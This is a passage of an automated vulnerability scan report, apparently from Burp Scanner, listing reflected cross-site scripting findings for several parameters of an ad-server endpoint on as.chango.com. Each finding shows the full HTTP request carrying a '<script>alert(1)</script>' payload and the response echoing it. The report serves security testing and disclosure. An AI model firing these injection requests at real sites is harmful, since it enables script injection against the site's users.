Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "621f0d845a9307f7bb3000478156714bbab31411"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2283
Date: Wed, 05 Oct 2011 21:35:16 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:16 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:16 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
d=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35767665494&wp=1.216667&kw=Malware+freeware&uf=4&kf=452172&atype=HISTORIC&test=0&adpos=0&bidder=bidder02-sj-west2fefb"><script>alert(1)</script>5a00be50b31&ioi=13672&ts=1317849596069&sig=c485c0cefccda7a06afc37dd5dfc0442&cu=&dsi=None&clickURL=">
...[SNIP]...

3.36. http://as.chango.com/links/adunit/1.31784959608e+12 [datc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the datc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab278"><script>alert(1)</script>8004c2bdc0b was submitted in the datc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+joseab278"><script>alert(1)</script>8004c2bdc0b&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "b2787e6a7b896013f2037b812760678dc94aa198"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:35:17 GMT
Content-Length: 2280
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:17 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:17 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
ttp://www.wattpad.com/stories/search/xss%20carbon&dom=wattpad.com&ibs=None&mw=1.0&poo=o&kwid=5827781&eid=Rubicon&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=san joseab278"><script>alert(1)</script>8004c2bdc0b&da=10087&st=broad&bm=1.35767665494&wp=1.216667&kw=Malware+freeware&uf=4&kf=452172&atype=HISTORIC&test=0&adpos=0&bidder=bidder02-sj-west&ioi=13672&ts=1317849596069&sig=c485c0cefccda7a06afc37dd5dfc0442&
...[SNIP]...

3.37. http://as.chango.com/links/adunit/1.31784959608e+12 [dc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the dc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbf0c"><script>alert(1)</script>f98a024da8a was submitted in the dc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemediacbf0c"><script>alert(1)</script>f98a024da8a&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "9e7a10ab1d1f5d0420a511a5a7f755fc2fa70fdb"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2283
Date: Wed, 05 Oct 2011 21:35:17 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:17 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemediacbf0c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ef98a024da8a%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:17 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
tpad.com&url=http://www.wattpad.com/stories/search/xss%20carbon&dom=wattpad.com&ibs=None&mw=1.0&poo=o&kwid=5827781&eid=Rubicon&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemediacbf0c"><script>alert(1)</script>f98a024da8a&datc=san jose&da=10087&st=broad&bm=1.35767665494&wp=1.216667&kw=Malware+freeware&uf=4&kf=452172&atype=HISTORIC&test=0&adpos=0&bidder=bidder02-sj-west&ioi=13672&ts=1317849596069&sig=c485c0cefccda7a06af
...[SNIP]...

3.38. http://as.chango.com/links/adunit/1.31784959608e+12 [dom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the dom request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8499"><script>alert(1)</script>a3ca4e080d0 was submitted in the dom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.comb8499"><script>alert(1)</script>a3ca4e080d0&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "707be14b16e07f517a7e0c5d21e584387c5d18ff"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2283
Date: Wed, 05 Oct 2011 21:35:17 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:17 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:17 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
sz=728x90;ord=1317850517935;click1=http://as.chango.com/links/click1317850517.94?acid=10699&adid=13711&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories/search/xss%20carbon&dom=wattpad.comb8499"><script>alert(1)</script>a3ca4e080d0&ibs=None&mw=1.0&poo=o&kwid=5827781&eid=Rubicon&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35767665494&wp=1.216667&kw=Malware+freewa
...[SNIP]...

3.39. http://as.chango.com/links/adunit/1.31784959608e+12 [eid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the eid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6dfa"><script>alert(1)</script>ba971af3b5 was submitted in the eid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicona6dfa"><script>alert(1)</script>ba971af3b5&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "4be98212c7bfecb897ccbebbe7fd8fba46dccd1d"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2259
Date: Wed, 05 Oct 2011 21:35:20 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:20 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicona6dfa%22%3E%3Cscript%3Ealert%281%29%3C/script%3Eba971af3b5%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:20 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
ango.com/links/click1317850520.11?acid=10699&adid=13711&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories/search/xss%20carbon&dom=wattpad.com&ibs=None&mw=1.0&poo=o&kwid=5827781&eid=Rubicona6dfa"><script>alert(1)</script>ba971af3b5&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35767665494&wp=0&kw=Malware+freeware&uf=4&kf=452172&atype=HISTORIC&test=0&adpos=0&bidder
...[SNIP]...

3.40. http://as.chango.com/links/adunit/1.31784959608e+12 [ht parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the ht request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c02f"><script>alert(1)</script>e7d61d5c8f5 was submitted in the ht parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=909c02f"><script>alert(1)</script>e7d61d5c8f5&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Content-Length: 464
Server: Chango RTB Server
ETag: "3efa5a2bfbe2bcc7441a5ad1686bb72f6a1daa4c"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:35:20 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:20 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:20 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
</head>
<body style="width: 728px; height: 909c02f"><script>alert(1)</script>e7d61d5c8f5px; margin: 0; padding: 0;">
...[SNIP]...

3.41. http://as.chango.com/links/adunit/1.31784959608e+12 [ibs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the ibs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcdd5"><script>alert(1)</script>30efd1cf622 was submitted in the ibs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=Nonefcdd5"><script>alert(1)</script>30efd1cf622&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "873cd6beed65147d925116060c8116f021355ef5"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:35:21 GMT
Content-Length: 2283
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:20 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:20 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
;ord=1317850520935;click1=http://as.chango.com/links/click1317850520.94?acid=10699&adid=13711&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories/search/xss%20carbon&dom=wattpad.com&ibs=Nonefcdd5"><script>alert(1)</script>30efd1cf622&mw=1.0&poo=o&kwid=5827781&eid=Rubicon&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35767665494&wp=1.216667&kw=Malware+freeware&uf=4&k
...[SNIP]...

3.42. http://as.chango.com/links/adunit/1.31784959608e+12 [poo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the poo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39283"><script>alert(1)</script>c1c0b3a1f05 was submitted in the poo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o39283"><script>alert(1)</script>c1c0b3a1f05&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "34b10f589afe874e2a80f449ea918c29527a3d0f"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2283
Date: Wed, 05 Oct 2011 21:35:23 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:23 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:23 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
23127;click1=http://as.chango.com/links/click1317850523.13?acid=10699&adid=13711&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories/search/xss%20carbon&dom=wattpad.com&ibs=None&mw=1.0&poo=o39283"><script>alert(1)</script>c1c0b3a1f05&kwid=5827781&eid=Rubicon&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35767665494&wp=1.216667&kw=Malware+freeware&uf=4&kf=452172&atyp
...[SNIP]...

3.43. http://as.chango.com/links/adunit/1.31784959608e+12 [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the sid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98b84"><script>alert(1)</script>1a58b06938f was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c98b84"><script>alert(1)</script>1a58b06938f&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
